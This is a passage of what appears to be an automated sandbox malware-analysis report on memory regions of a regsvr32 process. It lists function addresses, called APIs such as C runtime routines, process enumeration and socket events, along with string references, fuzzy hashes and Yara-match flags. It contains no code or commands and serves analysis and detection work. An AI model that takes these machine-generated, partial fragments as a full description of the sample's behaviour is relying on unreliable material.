_getbuf.LIBCMT ref: 0287AB1E

Memory Dump Source

Source File: 00000005.00000002.2927074227.0000000002871000.00000020.10000000.00040000.00000000.sdmp, Offset: 02871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2871000_regsvr32.jbxd

Similarity

API ID: _errno$_getbuf_invalid_parameter_noinfo_isatty
String ID:
API String ID: 3655708593-0
Opcode ID: 642cb293855d618c4a91b970ef39d385d556a10ffa7651e5e7a3e60ba922326b
Instruction ID: 2b34e81422987520854ac95d747c1005275d8b346359958c2ca9f0c995a579a9
Opcode Fuzzy Hash: 642cb293855d618c4a91b970ef39d385d556a10ffa7651e5e7a3e60ba922326b
Instruction Fuzzy Hash: 1D41AD3C214A0C8FDB5CEF2CC48176AB7E2FB98314B540699D86ACB2D6D734C891CB81

Function 02E6A080 Relevance: 6.1, APIs: 4, Instructions: 115COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 02E55AD8: _getptd.LIBCMT ref: 02E55AEA

_errno.LIBCMT ref: 02E6A0BE
_invalid_parameter_noinfo.LIBCMT ref: 02E6A0C8
_errno.LIBCMT ref: 02E6A0EC
_invalid_parameter_noinfo.LIBCMT ref: 02E6A0F6

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: _errno_invalid_parameter_noinfo$_getptd
String ID:
API String ID: 1297830140-0
Opcode ID: a1b2e992952563b09da4c9b68e1145a5c931054a8e89e35b43f293698d4bcdd3
Instruction ID: 9d0dedc4e1b5b07e76a27fb44c0ffb2ea09ee3d084b70962b66421eb92835e24
Opcode Fuzzy Hash: a1b2e992952563b09da4c9b68e1145a5c931054a8e89e35b43f293698d4bcdd3
Instruction Fuzzy Hash: F1411F626E879086CB21DF25D59826E7BA1F784BD4F04E132EF8A07B50DB38C045CB10

Function 02E58C6C Relevance: 6.1, APIs: 4, Instructions: 104COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 02E57574: _getptd.LIBCMT ref: 02E57578

_getptd.LIBCMT ref: 02E58CAB

Part of subcall function 02E5DF90: _amsg_exit.LIBCMT ref: 02E5DFA6

_SetImageBase.LIBCMT ref: 02E58D7E
_getptd.LIBCMT ref: 02E58DAC
_getptd.LIBCMT ref: 02E58DBA

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: _getptd$BaseImage_amsg_exit
String ID:
API String ID: 2306399499-0
Opcode ID: a02dd388b7b7f0f696520ad480e8c452745dcea769bd20a0fc531c877679dfad
Instruction ID: ea6b6ada8d91d85d22e4cc7efe7f6236b20095234ec7588fe8c05ab32d865a1b
Opcode Fuzzy Hash: a02dd388b7b7f0f696520ad480e8c452745dcea769bd20a0fc531c877679dfad
Instruction Fuzzy Hash: 3D31D3326A0A6185CE21EB16D48427DA7A6FF91FDCB15E221EF1A43770DB38C1C2CB00

Function 028798FC Relevance: 6.1, APIs: 4, Instructions: 99COMMON

Download Yara Rule

APIs

_FF_MSGBANNER.LIBCMT ref: 02879966
_FF_MSGBANNER.LIBCMT ref: 02879991
_RTC_Initialize.LIBCMT ref: 028799AA
_cinit.LIBCMT ref: 02879A07

Memory Dump Source

Source File: 00000005.00000002.2927074227.0000000002871000.00000020.10000000.00040000.00000000.sdmp, Offset: 02871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2871000_regsvr32.jbxd

Similarity

API ID: Initialize_cinit
String ID:
API String ID: 3622512177-0
Opcode ID: d1796c927132e00e55e5a4d5cf3bd2133c49abd461362aa7674a33a9edd3c0bc
Instruction ID: 69ffaf8c4872853c5c2350ca18ea049437fd7b094db32cfa7d4f13d316941196
Opcode Fuzzy Hash: d1796c927132e00e55e5a4d5cf3bd2133c49abd461362aa7674a33a9edd3c0bc
Instruction Fuzzy Hash: 9731293C6146068BEB54BBBCD9543AA32A6EF91309F14467AC509C7291FF69C840DB93

Function 028B9BE9 Relevance: 6.1, APIs: 4, Instructions: 98COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 028B9C14
_invalid_parameter_noinfo.LIBCMT ref: 028B9C1F
_getptd.LIBCMT ref: 028B9C45
free.LIBCMT ref: 028B9CB0

Memory Dump Source

Source File: 00000005.00000002.2927165195.00000000028B0000.00000040.00000020.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_28b0000_regsvr32.jbxd

Yara matches

Similarity

API ID: _errno_getptd_invalid_parameter_noinfofree
String ID:
API String ID: 4053972703-0
Opcode ID: a6b047b9ba05778c913bae5aa75a3fa791de028973cf7ce0c6a1d43e90da30c7
Instruction ID: 519cd26cdbfc7a6355abcb293290bd25e52d588cefdbd4a8336276d8e3334125
Opcode Fuzzy Hash: a6b047b9ba05778c913bae5aa75a3fa791de028973cf7ce0c6a1d43e90da30c7
Instruction Fuzzy Hash: 78218338608F098FEB49FBAC985966A77D1EF98311F10062EE94DC3361DB60D8418F93

Function 02E4A600 Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 02E4A637
Process32FirstW.KERNEL32 ref: 02E4A6AF
Process32NextW.KERNEL32 ref: 02E4A6F0
CloseHandle.KERNEL32 ref: 02E4A70C

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 9e68473edadeaf557d43ee5db64da582385d685932b15406e045d27e9c0fbed8
Instruction ID: d5375f079c87f631943fa85c2c5cf1ee3455a7a48a2823af02a67f2cfc4b920f
Opcode Fuzzy Hash: 9e68473edadeaf557d43ee5db64da582385d685932b15406e045d27e9c0fbed8
Instruction Fuzzy Hash: C0315E36684A8082EB24DF2AF46836A77A1F789BA8F55D235DE5E43794DF39C045CB00

Function 02E684D8 Relevance: 6.1, APIs: 4, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 02E684F7
_invalid_parameter_noinfo.LIBCMT ref: 02E68503
_errno.LIBCMT ref: 02E6852D
_errno.LIBCMT ref: 02E6858F

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: _errno$_invalid_parameter_noinfo
String ID:
API String ID: 2819658684-0
Opcode ID: c5488cea8a7420608f6a60d82c2d4936388b921319a0c2fb7a5c91bb596e3c00
Instruction ID: 2116f2fc08704984d36a0b651564703f1623b7fa81ea5479044bee893b5a8576
Opcode Fuzzy Hash: c5488cea8a7420608f6a60d82c2d4936388b921319a0c2fb7a5c91bb596e3c00
Instruction Fuzzy Hash: BA2126A27E87D08AD704CA69D4683BD2B93E3653C8F59E423DB4287742E7A5C84DCB11

Function 02E447F0 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON

Download Yara Rule

APIs

WSAEventSelect.WS2_32 ref: 02E4482E
WSAGetLastError.WS2_32 ref: 02E44839

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: ErrorEventLastSelect
String ID:
API String ID: 1135597009-0
Opcode ID: 956be7d5d60204c7e3c068f76d48fbfab2fb49e91de88ae288d2e3ac1e2e7a30
Instruction ID: e6558029e59e1e65a6a26425afa6a1437b15085800df663f8ba322b3caebb1b0
Opcode Fuzzy Hash: 956be7d5d60204c7e3c068f76d48fbfab2fb49e91de88ae288d2e3ac1e2e7a30
Instruction Fuzzy Hash: 19216DB361068086EB10CF7AE44835D37A2FB98B9CF545115DA19CBA94DF7AC486CB10

Function 02E45050 Relevance: 6.1, APIs: 4, Instructions: 56COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 02E4506C
LeaveCriticalSection.KERNEL32 ref: 02E45085
LeaveCriticalSection.KERNEL32 ref: 02E45105
SetEvent.KERNEL32 ref: 02E45125

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: CriticalSection$Leave$EnterEvent
String ID:
API String ID: 3394196147-0
Opcode ID: 21dc35a79e7d153aa5f527a3c9f68bbfba85f83a73de9e7e0ee8fccda7220007
Instruction ID: 7d243cce0a03027a621cc650468218d21e471fca866a8dff194389120800f78a
Opcode Fuzzy Hash: 21dc35a79e7d153aa5f527a3c9f68bbfba85f83a73de9e7e0ee8fccda7220007
Instruction Fuzzy Hash: 3F211636354B8493DB48CF26F58439DB3A4F758B94F549125EBAA43B24DF38E8A1C740

Function 02E5EA2C Relevance: 6.0, APIs: 4, Instructions: 45COMMONLIBRARYCODE

Download Yara Rule

APIs

_getptd.LIBCMT ref: 02E5EA36

Part of subcall function 02E5DF90: _amsg_exit.LIBCMT ref: 02E5DFA6

_lock.LIBCMT ref: 02E5EA64
free.LIBCMT ref: 02E5EA9A
_amsg_exit.LIBCMT ref: 02E5EAD3

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: _amsg_exit$_getptd_lockfree
String ID:
API String ID: 2148533958-0
Opcode ID: 5d29ed1caa0daea5f5dbfe864c41203751b69c3e2a73dd0d7e20f9917cc7433e
Instruction ID: 300f7c61cc263fee1aa937e0124fa55642720a30fd2d1d09880305965a884f7e
Opcode Fuzzy Hash: 5d29ed1caa0daea5f5dbfe864c41203751b69c3e2a73dd0d7e20f9917cc7433e
Instruction Fuzzy Hash: 92115E362A5A9086DF589B61E4807697366F748B88F4CA026FF0E03356DF38C551C700

Function 02E62A04 Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

_lock.LIBCMT ref: 02E62A18

Part of subcall function 02E62CBC: _amsg_exit.LIBCMT ref: 02E62CE6

fclose.LIBCMT ref: 02E62A48
DeleteCriticalSection.KERNEL32 ref: 02E62A6C
free.LIBCMT ref: 02E62A7D

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: CriticalDeleteSection_amsg_exit_lockfclosefree
String ID:
API String ID: 594724896-0
Opcode ID: 1af19892bbc03468291f82b11de21fd6e6f481048af7f94286d8aedfc065ae7b
Instruction ID: 3e94f1c8acf750c4d310966b2147a0013d1049513f1830093573a8cd86fac18a
Opcode Fuzzy Hash: 1af19892bbc03468291f82b11de21fd6e6f481048af7f94286d8aedfc065ae7b
Instruction Fuzzy Hash: 87118F365D0B8086EA208B29E49836DB761F784BD8F64A215EF9E43774CF36C482C704

Function 02E5DE2C Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

FlsFree.KERNEL32 ref: 02E5DE3B
DeleteCriticalSection.KERNEL32 ref: 02E62B67
free.LIBCMT ref: 02E62B70
DeleteCriticalSection.KERNEL32 ref: 02E62B97

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: CriticalDeleteSection$Freefree
String ID:
API String ID: 1250194111-0
Opcode ID: 3824737ec1521a2d4d93bf8402f796ef870551e1c1bfc4249913134d5e986940
Instruction ID: 2e440fd2f6b88408288ab77ae6c7d7a4238d73c217f87bd242e35ec1d8de0851
Opcode Fuzzy Hash: 3824737ec1521a2d4d93bf8402f796ef870551e1c1bfc4249913134d5e986940
Instruction Fuzzy Hash: 20118E36AC5A81CAEB14DF25F85C3287360FB94BE8F58A311DF5A06A65CB38C481C701

Function 02E556EC Relevance: 6.0, APIs: 4, Instructions: 33threadCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 02E55721
ExitThread.KERNEL32 ref: 02E55729
GetCurrentThreadId.KERNEL32 ref: 02E55730
_freefls.LIBCMT ref: 02E55761

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: Thread$CurrentErrorExitLast_freefls
String ID:
API String ID: 217443660-0
Opcode ID: cbffd315a96faa497177c600e0cbd82371ea40a3f718517a673364916740c137
Instruction ID: 6597b2cf35d928fff8b9f9bc95d60445994cdfe34d27d14189654f1d7a86dd3a
Opcode Fuzzy Hash: cbffd315a96faa497177c600e0cbd82371ea40a3f718517a673364916740c137
Instruction Fuzzy Hash: 5CF01D21BA1BA585DF14AFB2E84C35C32A6BB28B88F98A434DD4E87710EE3588148711

Function 02E50030 Relevance: 6.0, APIs: 4, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 02E41510: HeapFree.KERNEL32 ref: 02E41556
Part of subcall function 02E41510: free.LIBCMT ref: 02E41582

HeapDestroy.KERNEL32 ref: 02E5004E
HeapCreate.KERNEL32 ref: 02E5005F
free.LIBCMT ref: 02E50071
HeapDestroy.KERNEL32 ref: 02E50094

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: Heap$Destroyfree$CreateFree
String ID:
API String ID: 3907340440-0
Opcode ID: c96b4cbec601b2cff9b4cd5d9c6a714dd82caa753ffdd010ae51052e50cdef96
Instruction ID: 1ef8ad656b39fac314de855abb9ad8e6e2c63a9f9149386dabf78e138a5600c5
Opcode Fuzzy Hash: c96b4cbec601b2cff9b4cd5d9c6a714dd82caa753ffdd010ae51052e50cdef96
Instruction Fuzzy Hash: A3F0C476262A9097EB59DFA6E6943697375FB48B98F04A815EF2A03E10DF34D4B08700

Function 02E5F2FC Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

_getptd.LIBCMT ref: 02E5F302

Part of subcall function 02E5DF90: _amsg_exit.LIBCMT ref: 02E5DFA6

_getptd.LIBCMT ref: 02E5F322
_lock.LIBCMT ref: 02E5F335
_amsg_exit.LIBCMT ref: 02E5F363

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: _amsg_exit_getptd$_lock
String ID:
API String ID: 3670291111-0
Opcode ID: 6302b35e9a68ce893cca802b5f5e7a01f98d2e1d4d6a3a5cf8f19790a7114949
Instruction ID: 4589451bcc00c7300f2e6037576e39e0cba19a156616642ec5bbb36f66decf5c
Opcode Fuzzy Hash: 6302b35e9a68ce893cca802b5f5e7a01f98d2e1d4d6a3a5cf8f19790a7114949
Instruction Fuzzy Hash: 3FF0F8616E2550C6FB18AB61C894BB92362EB89B48F0CA178EE494B794DF288481CB11

Function 0288417C Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 209COMMONLIBRARYCODE

Download Yara Rule

APIs

_getptd.LIBCMT ref: 028841A0

Strings

csm, xrefs: 028841CD
csm, xrefs: 028842D7

Memory Dump Source

Source File: 00000005.00000002.2927074227.0000000002871000.00000020.10000000.00040000.00000000.sdmp, Offset: 02871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2871000_regsvr32.jbxd

Similarity

API ID: _getptd
String ID: csm$csm
API String ID: 3186804695-3733052814
Opcode ID: 101f134f4e12a7d59dd54e5d86992c5274962396a685041d1e783f31e629751d
Instruction ID: 7244c14355dba157322c3c3c47a233b3b94d8f8c3042c28f6c5c45d4d6084d8c
Opcode Fuzzy Hash: 101f134f4e12a7d59dd54e5d86992c5274962396a685041d1e783f31e629751d
Instruction Fuzzy Hash: DC516D3D208B0A8FCB64EE6C9484769B7D1FB98315F58426DE89DC7255DB30D881CB83

Function 028C4889 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 209COMMONLIBRARYCODE

Download Yara Rule

APIs

_getptd.LIBCMT ref: 028C48AD

Strings

csm, xrefs: 028C49E4
csm, xrefs: 028C48DA

Memory Dump Source

Source File: 00000005.00000002.2927165195.00000000028B0000.00000040.00000020.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_28b0000_regsvr32.jbxd

Yara matches

Similarity

API ID: _getptd
String ID: csm$csm
API String ID: 3186804695-3733052814
Opcode ID: 101f134f4e12a7d59dd54e5d86992c5274962396a685041d1e783f31e629751d
Instruction ID: da85d092d07593465130baad07946986872f15ca647782243961b2cdf263031d
Opcode Fuzzy Hash: 101f134f4e12a7d59dd54e5d86992c5274962396a685041d1e783f31e629751d
Instruction Fuzzy Hash: 60519E3C208B198FCB689E6C80A436973E1FB98316F64562ED48EC7261D730D8D5DB87

Function 02E59C08 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146COMMONLIBRARYCODE

Download Yara Rule

APIs

_getptd.LIBCMT ref: 02E59C2C

Part of subcall function 02E5DF90: _amsg_exit.LIBCMT ref: 02E5DFA6

Strings

csm, xrefs: 02E59C59
csm, xrefs: 02E59D63

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: _amsg_exit_getptd
String ID: csm$csm
API String ID: 4217099735-3733052814
Opcode ID: 0ebafe53c79dd1dc7c4b2410e29de92a4e8939059e6c475d33d2247252ee921c
Instruction ID: 8ab522c2abffeaf9e0f34c61434ec8ebc7833daef98aba8cbb03c77da722f8a5
Opcode Fuzzy Hash: 0ebafe53c79dd1dc7c4b2410e29de92a4e8939059e6c475d33d2247252ee921c
Instruction Fuzzy Hash: DB51D5322647A0CACB348F26D5447ED77A1F745B8CF04E115DE8957B46CB38E4A0CB82

Function 02E4DA44 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

Part of subcall function 02E55378: malloc.LIBCMT ref: 02E55392

wsprintfW.USER32 ref: 02E4DA98
CloseHandle.KERNEL32 ref: 02E4DC0B

Strings

%s_bin, xrefs: 02E4DA8E

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: CloseHandlemallocwsprintf
String ID: %s_bin
API String ID: 2399101171-2665034546
Opcode ID: 8cd04662d7078cabdf984b15f4d60648459fd27a36f456a8367ae7b316583ac3
Instruction ID: 4b160de932faafc4fa625f2549978b5bdd8116118ecbfed2d121446f9a0cead2
Opcode Fuzzy Hash: 8cd04662d7078cabdf984b15f4d60648459fd27a36f456a8367ae7b316583ac3
Instruction Fuzzy Hash: 5E41A9267A4AA481EF20DF62E818BAD3369FB85F98F48D126DE5E07784DF38C144C701

Function 028791CC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 02879245
_invalid_parameter_noinfo.LIBCMT ref: 02879250

Part of subcall function 0287A834: _errno.LIBCMT ref: 0287A882
Part of subcall function 0287A834: _invalid_parameter_noinfo.LIBCMT ref: 0287A88D

Part of subcall function 0287AA68: _errno.LIBCMT ref: 0287AA95

Strings

B, xrefs: 02879275

Memory Dump Source

Source File: 00000005.00000002.2927074227.0000000002871000.00000020.10000000.00040000.00000000.sdmp, Offset: 02871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2871000_regsvr32.jbxd

Similarity

API ID: _errno$_invalid_parameter_noinfo
String ID: B
API String ID: 2819658684-1255198513
Opcode ID: ee0464697b4dab9c83a21f4d43ccea67558d6137176d20332e089b8e5b9fb0e9
Instruction ID: 407d13a51b5ed2bace0fbb4b0bd7f46e1d1c879be7244705f0f1d920b887d217
Opcode Fuzzy Hash: ee0464697b4dab9c83a21f4d43ccea67558d6137176d20332e089b8e5b9fb0e9
Instruction Fuzzy Hash: B621533D218B484FD748EB6CD44476A76D2FFA8328F54066EE45DC72A1DB78C944CB82

Function 02887323 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON

Download Yara Rule

APIs

_getptd.LIBCMT ref: 028873E7

Strings

csm, xrefs: 028873A3
csm, xrefs: 0288734A

Memory Dump Source

Source File: 00000005.00000002.2927074227.0000000002871000.00000020.10000000.00040000.00000000.sdmp, Offset: 02871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2871000_regsvr32.jbxd

Similarity

API ID: _getptd
String ID: csm$csm
API String ID: 3186804695-3733052814
Opcode ID: 7c507ed6b6e76c727c6852df3bb056a156e285415972c8a1159783b32befb719
Instruction ID: 73ef610f03f12cf596e1b657e04cc4187f5aa62d93ef2b0da6502cf237a7dbe4
Opcode Fuzzy Hash: 7c507ed6b6e76c727c6852df3bb056a156e285415972c8a1159783b32befb719
Instruction Fuzzy Hash: 9931AE7951060CCFDF94EF08C084B987BB1FB18369F9A12A8E80DDB611C375D881CB86

Function 028C7A30 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON

Download Yara Rule

APIs

_getptd.LIBCMT ref: 028C7AF4

Strings

csm, xrefs: 028C7A57
csm, xrefs: 028C7AB0

Memory Dump Source

Source File: 00000005.00000002.2927165195.00000000028B0000.00000040.00000020.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_28b0000_regsvr32.jbxd

Yara matches

Similarity

API ID: _getptd
String ID: csm$csm
API String ID: 3186804695-3733052814
Opcode ID: 2390259f5c7b96c66dbe66369981e250b2529a0f82c8583acd2dcf66a4ceee86
Instruction ID: 394352d253856d7ad5ec5c2f53425d145ac0667e12395180dda3280821c6aa07
Opcode Fuzzy Hash: 2390259f5c7b96c66dbe66369981e250b2529a0f82c8583acd2dcf66a4ceee86
Instruction Fuzzy Hash: CA31B27911060CCFDF94DF08C484B987BA9FB18369F9612A8E80DDB611C371D990CF84

Function 02E6D527 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58COMMON

Download Yara Rule

APIs

_getptd.LIBCMT ref: 02E6D5EB

Strings

csm, xrefs: 02E6D54E
csm, xrefs: 02E6D5A7

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: _getptd
String ID: csm$csm
API String ID: 3186804695-3733052814
Opcode ID: 008a1cef3fd956798f7d73ea4517d52a7d073b0e4720bf3f8ed94ca8c68e0db9
Instruction ID: 9d5bce6be0d4bd7e69cf5fc9ec548aa12c038ee6320da395ab63ec8f815c38d7
Opcode Fuzzy Hash: 008a1cef3fd956798f7d73ea4517d52a7d073b0e4720bf3f8ed94ca8c68e0db9
Instruction Fuzzy Hash: 99218577680654CADB208F66C8887AC3B75F358BEDF8A6215EA4D0BF18CB75C490C784

Function 02E55530 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 02E554B1
_invalid_parameter_noinfo.LIBCMT ref: 02E554BC

Strings

B, xrefs: 02E554E1

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: _errno_invalid_parameter_noinfo
String ID: B
API String ID: 2959964966-1255198513
Opcode ID: d9f8633fb066bb926e08558761ed9d779cc0cbf5af2a47bf39fdd692a1c5aced
Instruction ID: 5489f703ee64efe175ef25838af9d1d6a837ffb4deafca7c55e45c5b6536b3eb
Opcode Fuzzy Hash: d9f8633fb066bb926e08558761ed9d779cc0cbf5af2a47bf39fdd692a1c5aced
Instruction Fuzzy Hash: BB11607226479086DB209F16E450259B7A2F788BE8F98A225EF9D57B54CB38C141CF00

Function 02887423 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 02881EAC: _getptd.LIBCMT ref: 02881EB9
Part of subcall function 02881EAC: _getptd.LIBCMT ref: 02881ECC

_getptd.LIBCMT ref: 02887484
_getptd.LIBCMT ref: 02887497

Strings

csm, xrefs: 02887443

Memory Dump Source

Source File: 00000005.00000002.2927074227.0000000002871000.00000020.10000000.00040000.00000000.sdmp, Offset: 02871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2871000_regsvr32.jbxd

Similarity

API ID: _getptd
String ID: csm
API String ID: 3186804695-1018135373
Opcode ID: 4682075a758e49528a487afa047c3333b91a60c7711f6bd7727fe6ef45998704
Instruction ID: ad0c00b59a6022785f4df67b0fd478877533ac28ca28b8f843cbd7a717d40d28
Opcode Fuzzy Hash: 4682075a758e49528a487afa047c3333b91a60c7711f6bd7727fe6ef45998704
Instruction Fuzzy Hash: 08010C3C91160C8FEF78FF5C88847A477A5FB18316F5541A9D80DCB642DB719984CB42

Function 028C7B30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 028C25B9: _getptd.LIBCMT ref: 028C25C6
Part of subcall function 028C25B9: _getptd.LIBCMT ref: 028C25D9

_getptd.LIBCMT ref: 028C7B91
_getptd.LIBCMT ref: 028C7BA4

Strings

csm, xrefs: 028C7B50

Memory Dump Source

Source File: 00000005.00000002.2927165195.00000000028B0000.00000040.00000020.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_28b0000_regsvr32.jbxd

Yara matches

Similarity

API ID: _getptd
String ID: csm
API String ID: 3186804695-1018135373
Opcode ID: 4682075a758e49528a487afa047c3333b91a60c7711f6bd7727fe6ef45998704
Instruction ID: 1cb06dd8cef97762df8dc690ab3c27051cac9e7b88f460c9533240c396bbfbba
Opcode Fuzzy Hash: 4682075a758e49528a487afa047c3333b91a60c7711f6bd7727fe6ef45998704
Instruction Fuzzy Hash: 7501257C10060D8FCF78EF2C88A57A433AAFB18215FA5166EC85DCA645CB31C880CF02

Function 02E56480 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 02E56429
_invalid_parameter_noinfo.LIBCMT ref: 02E56434

Strings

B, xrefs: 02E56460

Memory Dump Source

